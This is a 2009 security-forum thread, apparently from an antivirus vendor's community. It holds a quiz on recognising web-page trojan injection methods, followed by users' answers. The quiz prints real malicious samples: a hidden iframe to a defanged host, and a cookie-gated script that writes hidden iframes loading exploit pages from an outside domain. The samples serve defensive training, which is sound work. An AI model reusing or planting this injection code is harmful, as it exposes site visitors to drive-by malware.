瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马解密初级篇知识点巩固(考核)
networkedition - 2009-5-14 15:53:00
卡卡讲堂之网马解密 初级篇
卡卡讲堂之网马解密 中级篇
卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.Freshow解密工具的详细用法
2.网马解密之——Eval篇
3.网马解密之——Document.write篇
4.网马解密之——Alpha2篇
5.网马解密之——Shellcode篇
6.网马解密之——Base64篇
7.网马解密之——US-ASCII篇
8.浅谈eval解密之——工具篇


网马解密的初级教程基本完成,为了加强初学者的记忆,根据初级教程的内容,编写几道小测试题,希望初学者能踊跃参与,跟帖进行讨论。(最好不要照抄原文哟,已自己能理解的方式来回答)


1.请列举出几种常见网页挂马方式;

2.常见网页挂马所利用的漏洞有哪些

3.请说出下列挂马方式属于哪一种挂马方式
a) if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://xxxo1.cn/a/a7.htm></iframe>")
document.write("</div>")}
b)<iframe src="cnzz.htm" width=111 height=0 border=0></iframe>
c)<script src="14.js"></script>
4.下列网页挂马用到了哪些系统的漏洞及第三方软件的漏洞
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=nishisb;expires="+ Then.toGMTString()
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/bf.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/swf.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/real2.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/old.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/09002.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/tj.htm><\/iframe>");
}
}Get();

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
帅哥阿福 - 2009-5-14 15:58:00
1.iframe挂马;脚本挂马。
2.播放器漏洞;下载器漏洞;ms(忘了号码了)
3.a不知道,bifram挂马,c脚本挂马
4.暴风影音;flash;real;。。。。。
左眼球 - 2009-5-14 16:47:00
顶起来啊,一定要好好学习
1、iframe 挂马、脚本挂马、CSS样式表挂马

2、操作系统漏洞、第三方软件漏洞

3、
a、脚本输出iframe框架挂马
b、iframe框架挂马
c、js脚本挂马

4、
bf.htm —— 暴风影音
swf.htm —— flash插件
real2.htm —— realplayer播放器
old.htm —— 里面挂了qvod、flash、联众、超星、ms06-041、uc、uusee、暴风影音、realplayer
09002.htm —— ms09-002
tj.htm —— 貌似就一个51yes的统计脚本,没别的了
水中蝌蚪 - 2009-5-15 13:34:00
3、
a、脚本输出iframe框架挂马

这个怎么看出来的,能详细说说吗?
networkedition - 2009-5-15 13:41:00
document.write("<iframe src=hxxp://xxxo1.cn/a/a7.htm></iframe>")
可通过此句来判断
水中蝌蚪 - 2009-5-15 13:53:00
怎么看出是脚本输出呢?
networkedition - 2009-5-15 14:04:00
Microsoft JScript 提供了两种方式来在浏览器中直接显示数据。可以使用write( ) 和 writeln( ),这两个函数是document 对象的方法。也可以在浏览器中以表格的方式显示信息,以及用警告、提示和确认消息框来显示信息。

使用document.write( ) 和 document.writeln( )
显示信息最常用的方式是 document 对象的 write( ) 方法。该方法用一个字符串作为其参数,并在浏览器中显示。该字符串可以是普通文本或 HTML。

Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上。
水中蝌蚪 - 2009-5-15 14:22:00
嘿嘿,好像明白了,楼主多举几个例子吧,说的详细点
networkedition - 2009-5-15 14:49:00
我写了两个小例子,可以直接运行后看看效果,另外可以看看源代码,比较有什么不同就明白了。

附件: 例子.rar
艾玛 - 2009-5-15 15:47:00


引用:
原帖由 networkedition 于 2009-5-15 14:04:00 发表
Microsoft JScript 提供了两种方式来在浏览器中直接显示数据。可以使用write( ) 和 writeln( ),这两个函数是document 对象的方法。也可以在浏览器中以表格的方式显示信息,以及用警告、提示和确认消息框来显示信息。

使用document.write( ) 和 document.writeln( )
显示信息最常用的方式是 document 对象的 writ




Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上。

:kaka12: 这句给亮一亮
networkedition - 2009-5-15 15:52:00
大版主多多指导呀:kaka12:
艾玛 - 2009-5-15 15:56:00
这是您的地盘,您尽管发挥,有好文顶顶!鉴定鉴定!
高博高博高博 - 2009-6-8 20:26:00
gaoshou a
零度的穷浪漫 - 2009-8-3 1:19:00
1.框架挂马:js文件挂马:;js变形加密; flash木马; 不点出现链接的木马;隐蔽挂马;css中挂马;Java挂马;图片伪装;伪装调用;高级欺骗;
2.操作系统漏洞;第三方软件漏洞;播放器漏洞;
3.a.不知道啊?
  b.框架挂马
  c.js挂马
4.系统漏洞  MS090-02漏洞
第三方软件漏洞  暴风影音漏洞
凯撒不骑马 - 2013-4-3 11:38:00
1.框架挂马 javascript输出框架挂马 cssjavascript挂马 javascript弹窗口挂马
2.flash漏洞 ms什么什么漏洞 联众游戏 漏洞
3老师第三那个算不算javascript挂马啊
4.flash 漏洞
1
查看完整版本: 网马解密初级篇知识点巩固(考核)